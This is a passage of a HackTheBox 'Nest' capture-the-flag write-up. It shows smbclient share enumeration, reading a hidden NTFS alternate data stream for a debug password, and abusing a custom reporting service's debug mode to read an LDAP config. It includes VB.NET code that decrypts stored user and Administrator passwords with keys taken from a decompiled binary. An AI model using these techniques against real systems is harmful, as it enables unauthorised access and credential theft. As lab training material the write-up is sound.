initVectorBytes = Encoding.ASCII.GetBytes(initVector)

Dim saltValueBytes As Byte()
saltValueBytes = Encoding.ASCII.GetBytes(saltValue)

Dim cipherTextBytes As Byte()
cipherTextBytes = Convert.FromBase64String(cipherText)

Dim password As New Rfc2898DeriveBytes(passPhrase, _
saltValueBytes, _
passwordIterations)

Dim keyBytes As Byte()
keyBytes = password.GetBytes(CInt(keySize / 8))

Dim symmetricKey As New AesCryptoServiceProvider
symmetricKey.Mode = CipherMode.CBC

Dim decryptor As ICryptoTransform
decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes)

Dim memoryStream As IO.MemoryStream
memoryStream = New IO.MemoryStream(cipherTextBytes)

Dim cryptoStream As CryptoStream
cryptoStream = New CryptoStream(memoryStream, _
decryptor, _
CryptoStreamMode.Read)

Dim plainTextBytes As Byte()
ReDim plainTextBytes(cipherTextBytes.Length)

Dim decryptedByteCount As Integer
decryptedByteCount = cryptoStream.Read(plainTextBytes, _
0, _
plainTextBytes.Length)

memoryStream.Close()
cryptoStream.Close()

Dim plainText As String
plainText = Encoding.ASCII.GetString(plainTextBytes, _
0, _
decryptedByteCount)

Return plainText
End Function

End Class

root in WIP/RU/RUScanner


Decrypting the Password

We can cut and patch some of this code together to make a single file we can run on dotnetfiddle
I put the hash I got early on the line run the line Return Decrypt script. the decryption is happen here :

Decrypt(“HASH”, “N3st22”, “88552299”, 2, “464R5DFA5DL6LE28”, 256) so :

from :

# bash

Public Shared Function DecryptString(EncryptedString As String) As String
If String.IsNullOrEmpty(EncryptedString) Then
Return String.Empty
Else
# replace hash here
Return Decrypt(EncryptedString, "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
End If
End Function

to :

# bash

Public Shared Function DecryptString(EncryptedString As String) As String
If String.IsNullOrEmpty(EncryptedString) Then
Return String.Empty
Else
# replace hash here
Return Decrypt("fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=", "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256)
End If
End Function

Execute this and we will get the password xRxRxPANCAK3SxRxRx this is the final results :

HackTheBox-Nest


Exploitation

Enumerate C.Smith

So now that I successfully decrypt the password. How about try to login it again in smbclient :

# bash

root in htb/boxes/Nest
❯ smbclient \\\\10.10.10.178\\Users -U C.Smith
Enter WORKGROUP\C.Smith's password:
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> ls
. D 0 Sun Jan 26 07:04:21 2020
.. D 0 Sun Jan 26 07:04:21 2020
Administrator D 0 Fri Aug 9 23:08:23 2019
C.Smith D 0 Sun Jan 26 15:21:44 2020
L.Frost D 0 Fri Aug 9 01:03:01 2019
R.Thompson D 0 Fri Aug 9 01:02:50 2019
TempUser D 0 Thu Aug 8 06:55:56 2019

\Administrator
NT_STATUS_ACCESS_DENIED listing \Administrator\*

\C.Smith
. D 0 Sun Jan 26 15:21:44 2020
.. D 0 Sun Jan 26 15:21:44 2020
HQK Reporting D 0 Fri Aug 9 07:06:17 2019
user.txt A 32 Fri Aug 9 07:05:24 2019

\L.Frost
NT_STATUS_ACCESS_DENIED listing \L.Frost\*

\R.Thompson
NT_STATUS_ACCESS_DENIED listing \R.Thompson\*

\TempUser
NT_STATUS_ACCESS_DENIED listing \TempUser\*

\C.Smith\HQK Reporting
. D 0 Fri Aug 9 07:06:17 2019
.. D 0 Fri Aug 9 07:06:17 2019
AD Integration Module D 0 Fri Aug 9 20:18:42 2019
Debug Mode Password.txt A 0 Fri Aug 9 07:08:17 2019
HQK_Config_Backup.xml A 249 Fri Aug 9 07:09:05 2019

\C.Smith\HQK Reporting\AD Integration Module
. D 0 Fri Aug 9 20:18:42 2019
.. D 0 Fri Aug 9 20:18:42 2019
HqkLdap.exe A 17408 Thu Aug 8 07:41:16 2019

so looks like i can now get the user.txt as you can see on this line :

# bash

smb: \> cd C.Smith
smb: \C.Smith\> ls
. D 0 Sun Jan 26 15:21:44 2020
.. D 0 Sun Jan 26 15:21:44 2020
HQK Reporting D 0 Fri Aug 9 07:06:17 2019
user.txt A 32 Fri Aug 9 07:05:24 2019

\C.Smith\HQK Reporting
. D 0 Fri Aug 9 07:06:17 2019
.. D 0 Fri Aug 9 07:06:17 2019
AD Integration Module D 0 Fri Aug 9 20:18:42 2019
Debug Mode Password.txt A 0 Fri Aug 9 07:08:17 2019
HQK_Config_Backup.xml A 249 Fri Aug 9 07:09:05 2019

\C.Smith\HQK Reporting\AD Integration Module
. D 0 Fri Aug 9 20:18:42 2019
.. D 0 Fri Aug 9 20:18:42 2019
HqkLdap.exe A 17408 Thu Aug 8 07:41:16 2019

10485247 blocks of size 4096. 6544137 blocks available
smb: \C.Smith\>

Grab the user flag

Finally I have now the user.txt i downloaded it using smbclient :

# bash

smb: \C.Smith\> mget user.txt
Get file user.txt? y
getting file \C.Smith\user.txt of size 32 as user.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \C.Smith\>

root in htb/boxes/Nest 
cut -c 4-12 user.txt
b25404be


Privilege Escalation

So going to the firs enumeration of C.Smith there’s a interesting .txt file and executable HqkLdap.exe as you see on this line :

# bash

\C.Smith\HQK Reporting
. D 0 Thu Aug 8 19:06:17 2019
.. D 0 Thu Aug 8 19:06:17 2019
AD Integration Module D 0 Fri Aug 9 08:18:42 2019
Debug Mode Password.txt A 0 Thu Aug 8 19:08:17 2019
HQK_Config_Backup.xml A 249 Thu Aug 8 19:09:05 2019

\C.Smith\HQK Reporting\AD Integration Module
. D 0 Fri Aug 9 08:18:42 2019
.. D 0 Fri Aug 9 08:18:42 2019
HqkLdap.exe A 17408 Wed Aug 7 19:41:16 2019

I initially came across the Debug Mode Password.txt file and thought this could be used to authenticate to the DEBUG mode of the HQK Reporting Service v1.2 service running on port 4386 we see this on our nmap scan. The file appeared to have 0 bytes. I spent some time searching around further and couldn’t find any other files of interest. After wasting some time on futile approaches, I eventually realized that the file could potentially have had alternate streams on an NTFS file system. I enumerated the streams and retrieved the Password stream of the file :

# bash

smb: \C.Smith\HQK Reporting\> more DEBUGM~1.TXT:Password:$DATA
getting file \C.Smith\HQK Reporting\DEBUGM~1.TXT:Password:$DATA of size 15 as /tmp/smbmore.mFLHg4 (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)

WBQ201953D8w
/tmp/smbmore.mFLHg4

smb: \C.Smith\>

if I run allinfo on it, I can see something else:

# bash

smb: \C.Smith\HQK Reporting\> allinfo "Debug Mode Password.txt"
altname: DEBUGM~1.TXT
create_time: Thu Aug 8 07:06:12 PM 2019 EDT
access_time: Thu Aug 8 07:06:12 PM 2019 EDT
write_time: Thu Aug 8 07:08:17 PM 2019 EDT
change_time: Thu Aug 8 07:08:17 PM 2019 EDT
attributes: A (20)
stream: [::$DATA], 0 bytes
stream: [:Password:$DATA], 15 bytes

cat Debug\ Mode\ Password.txt:Password
WBQ201953D8w

So this really interesting it shows password debug : WBQ201953D8w this will be something useful later :

Enumeration with telnet

I’ll connect again to HQK with telnet in port 4386 and start digging. We can then use the password debug to gain the ability to run the SHOWQUERY command on the HQK Reporting Service. This functionality can be used to read files. After spending some time searching around I came across the Ldap.conf file that is located in ../LDAP/.

# bash

root in htb/boxes/Nest
❯ telnet 10.10.10.178 4386
Trying 10.10.10.178...
Connected to 10.10.10.178.
Escape character is '^]'.

HQK Reporting Service V1.2

>help

This service allows users to run queries against databases using the legacy HQK format

--- AVAILABLE COMMANDS ---

LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
>

>DEBUG WBQ201953D8w

Debug mode enabled. Use the HELP command to view additional commands that are now available
>


Debug mode enabled. Use the HELP command to view additional commands that are now available
>help

This service allows users to run queries against databases using the legacy HQK format

--- AVAILABLE COMMANDS ---

LIST
SETDIR <Directory_Name>
RUNQUERY <Query_ID>
DEBUG <Password>
HELP <Command>
SERVICE
SESSION
SHOWQUERY <Query_ID>

>

I set the dir to HQK

# bash

>setdir ..

Current directory set to HQK
>list

Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

QUERY FILES IN CURRENT DIRECTORY

[DIR] ALL QUERIES
[DIR] LDAP
[DIR] Logs
[1] HqkSvc.exe
[2] HqkSvc.InstallState
[3] HQK_Config.xml

Current Directory: HQK
>


Current Directory: HQK
>setdir LDAP

Current directory set to LDAP
>list

Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

QUERY FILES IN CURRENT DIRECTORY

[1] HqkLdap.exe
[2] Ldap.conf

Current Directory: LDAP
>

I try to show the Ldap.conf and it give us administrator credentials but the password looks like encrypted again .

# bash

Use the query ID numbers below with the RUNQUERY command and the directory names with the SETDIR command

QUERY FILES IN CURRENT DIRECTORY

[1] HqkLdap.exe
[2] Ldap.conf

Current Directory: LDAP
>showquery 2

Domain=nest.local
Port=389
BaseOu=OU=WBQ Users,OU=Production,DC=nest,DC=local
User=Administrator
Password=yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=

>

Analyzing the HqkLdap.exe

I downloaded the HqkLdap.exe and analyze it using JetBrains - dotPeek it is a free NET Decompiler and Assembly

# bash

smb: \C.Smith\HQK Reporting\AD Integration Module\> mget HqkLdap.exe
Get file HqkLdap.exe? y
getting file \C.Smith\HQK Reporting\AD Integration Module\HqkLdap.exe of size 17408 as HqkLdap.exe (7.5 KiloBytes/sec) (average 7.5 KiloBytes/sec)
smb: \C.Smith\HQK Reporting\AD Integration Module\>

Looking at CR Module binary :

HackTheBox-Nest

This contains the Arguments that we have to pass in the same script from which we Decrypted the user hash because the hash that we found in LDAP.conf is encrypted using another method which we got in CR module(part) and the arguments that we will pass in the decrypt function and compile it.

Debugging the HqkLdap.exe

Did you rember the vb script that will decrypt the encryped password ? I use it again to decrypt also the admin password hash . I replace only this line :

from

Decrypt(“HASH”, “N3st22”, “88552299”, 2, “464R5DFA5DL6LE28”, 256)
"fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=", "N3st22", "88552299", 2, "464R5DFA5DL6LE28", 256

to :

Decrypt(“HASH”, “667912”, “1313Rf99”, 3, “1L1SA61493DRV53Z”, 256)
"yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=", "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256

This is the final script

# vb.net

Imports System.Text
Imports System
Imports System.Security.Cryptography

Public Module Module1
Public Sub Main()
Console.WriteLine(Decrypt("yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=", "667912", "1313Rf99", 3, "1L1SA61493DRV53Z", 256))
End Sub
Public Function Decrypt(ByVal cipherText As String, _
ByVal passPhrase As String, _
ByVal saltValue As String, _
ByVal passwordIterations As Integer, _
ByVal initVector As String, _
ByVal keySize As Integer) _
As String

Dim initVectorBytes As Byte()
initVectorBytes = Encoding.ASCII.GetBytes(initVector)

Dim saltValueBytes As Byte()
saltValueBytes = Encoding.ASCII.GetBytes(saltValue)

Dim cipherTextBytes As Byte()
cipherTextBytes = Convert.FromBase64String(cipherText)

Dim password As New Rfc2898DeriveBytes(passPhrase, _
saltValueBytes, _
passwordIterations)

Dim keyBytes As Byte()
keyBytes = password.GetBytes(CInt(keySize / 8))

Dim symmetricKey As New AesCryptoServiceProvider
symmetricKey.Mode = CipherMode.CBC

Dim decryptor As ICryptoTransform
decryptor = symmetricKey.CreateDecryptor(keyBytes, initVectorBytes)

Dim memoryStream As IO.MemoryStream
memoryStream = New IO.MemoryStream(cipherTextBytes)

Dim cryptoStream As CryptoStream
cryptoStream = New CryptoStream(memoryStream, _
decryptor, _
CryptoStreamMode.Read)

Dim plainTextBytes As Byte()
ReDim plainTextBytes(cipherTextBytes.Length)

Dim decryptedByteCount As Integer
decryptedByteCount = cryptoStream.Read(plainTextBytes, _
0, _
plainTextBytes.Length)

memoryStream.Close()
cryptoStream.Close()

Dim plainText As String
plainText = Encoding.ASCII.GetString(plainTextBytes, _
0, _
decryptedByteCount)

Return plainText
End Function
End Module


Copy and execute this in dotnetfiddle and we will get the password :

HackTheBox-Nest

Administrator password : XtH4nkS4Pl4y1nGX

Grabbing the root.txt

Sadly we can’t use this in Evil-WinRM we don’t have proper shell to get the root.txt just only smbclient

# bash

root in htb/boxes/Nest
❯ smbclient \\\\10.10.10.178\\c$ -U Administrator
Enter WORKGROUP\Administrator's password:
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> cd Users\Administrator\Desktop\
smb: \Users\Administrator\Desktop\> ls
. DR 0 Sun Jan 26 15:20:50 2020
.. DR 0 Sun Jan 26 15:20:50 2020
desktop.ini AHS 282 Sun Jan 26 06:02:44 2020
root.txt A 32 Tue Aug 6 06:27:26 2019

10485247 blocks of size 4096. 6545433 blocks available
smb: \Users\Administrator\Desktop\> get root.txt
getting file \Users\Administrator\Desktop\root.txt of size 32 as root.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \Users\Administrator\Desktop\>

download the root.txt and finally !

# bash

root in htb/boxes/Nest
ls
'Debug Mode Password.txt' HqkLdap.exe IT 'Maintenance Alerts.txt' nmap-Nest Production Reports root.txt Shared user.txt 'Welcome Email.txt'

root in htb/boxes/Nest
cut -c 4-12 root.txt
c2eb084bc
root in htb/boxes/Nest



If you liked my writeup please leave a respect on my Profile

Payas0


Referrences:

dotPeek - .NET Decompiler and Assembly

dotnetfiddle